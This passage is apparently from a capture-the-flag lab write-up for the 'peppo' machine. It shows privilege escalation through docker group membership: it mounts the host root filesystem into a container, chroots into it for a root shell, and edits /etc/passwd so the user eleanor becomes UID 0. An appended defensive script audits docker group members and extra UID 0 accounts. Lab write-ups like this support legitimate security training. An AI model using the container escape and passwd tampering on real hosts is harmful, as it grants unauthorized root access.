Docker Group


It has been identified that the current user, eleanor, is part of the docker group.

$ docker images 
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
redmine             latest              0c8429c66e07        4 years ago         542MB
postgres            latest              adf2b126dda8        4 years ago         313MB

These are the 2 existing images that power the Redmine and PostgreSQL instances.

$ docker run -it --rm -v /:/mnt adf2b126dda8 chroot /mnt bash

I will just grab one of the images and get a shell inside a Docker container with root access to the host filesystem.

root@04955d31f87c:/# nano /etc/passwd

Then I will turn the eleanor user into the root account and also remove the rbash shell.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/peppo]
└─$ sshpass -p eleanor ssh eleanor@$IP 
Linux peppo 4.9.0-12-amd64 #1 SMP Debian 4.9.210-1 (2020-01-20) x86_64
 
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Sat Mar 29 19:24:25 2025 from 192.168.45.218
root@peppo:~# /usr/bin/whoami
root
root@peppo:~# /bin/hostname
peppo
root@peppo:~# /sbin/ifconfig
docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:87:bb:a4:ca  txqueuelen 0  (Ethernet)
        RX packets 128581  bytes 55474609 (52.9 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 189070  bytes 20259928 (19.3 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.154.60  netmask 255.255.255.0  broadcast 192.168.154.255
        ether 00:50:56:9e:e8:b9  txqueuelen 1000  (Ethernet)
        RX packets 1247061  bytes 134053660 (127.8 MiB)
        RX errors 0  dropped 319  overruns 0  frame 0
        TX packets 433661  bytes 124752208 (118.9 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
veth069982c: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        ether 5a:51:6a:02:fe:37  txqueuelen 0  (Ethernet)
        RX packets 113  bytes 7835 (7.6 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 147  bytes 12898 (12.5 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
veth6f82195: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        ether fe:0f:9a:09:8e:9b  txqueuelen 0  (Ethernet)
        RX packets 128468  bytes 57266908 (54.6 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 188929  bytes 20247394 (19.3 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
vethb59a7ff: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        ether c6:16:09:ac:af:8c  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System-level compromise
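
From the defender's side, the two conditions this write-up relies on can be audited directly: accounts with docker group membership, and accounts other than root that carry UID 0 in the passwd file. The script below is an added example, not part of the original write-up; the sample passwd and group contents (UIDs, GIDs, and the svc account) are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up). Audits passwd/group-format
# files for docker-group access and unexpected UID 0 accounts.

# Accounts that can reach the Docker daemon through group membership:
# supplementary members plus users whose primary GID is that group.
# Usage: docker_group_members PASSWD_FILE GROUP_FILE [GROUP_NAME]
docker_group_members() {
    dgm_name=${3:-docker}
    dgm_gid=$(awk -F: -v g="$dgm_name" '$1 == g { print $3; exit }' "$2")
    [ -n "$dgm_gid" ] || return 0   # group absent: nothing to report
    {
        awk -F: -v g="$dgm_name" '$1 == g {
            n = split($4, m, ",")
            for (i = 1; i <= n; i++) if (m[i] != "") print m[i]
        }' "$2"
        awk -F: -v gid="$dgm_gid" '$4 == gid { print $1 }' "$1"
    } | sort -u
}

# Accounts other than "root" whose UID field is 0.
extra_uid0_accounts() {
    awk -F: '$3 ~ /^0+$/ && $1 != "root" { print $1 }' "$1" | sort
}

# Constructed samples: a baseline passwd, a tampered copy, and a group file.
write_samples() {
    cat > "$1/passwd.baseline" <<'EOF'
root:x:0:0:root:/root:/bin/bash
eleanor:x:1000:1000::/home/eleanor:/bin/rbash
svc:x:1001:999::/home/svc:/usr/sbin/nologin
EOF
    cat > "$1/passwd.tampered" <<'EOF'
root:x:0:0:root:/root:/bin/bash
eleanor:x:0:0::/home/eleanor:/bin/bash
svc:x:1001:999::/home/svc:/usr/sbin/nologin
EOF
    cat > "$1/group" <<'EOF'
root:x:0:
docker:x:999:eleanor
EOF
}

SAMPLES=$(mktemp -d)
write_samples "$SAMPLES"
echo "docker-equivalent: $(docker_group_members "$SAMPLES/passwd.baseline" "$SAMPLES/group" | tr '\n' ' ')"
echo "extra UID 0 (baseline): $(extra_uid0_accounts "$SAMPLES/passwd.baseline")"
echo "extra UID 0 (tampered): $(extra_uid0_accounts "$SAMPLES/passwd.tampered")"
```

On a real host, pass /etc/passwd and /etc/group to the two functions; any account the first one lists should be treated as having root-equivalent access.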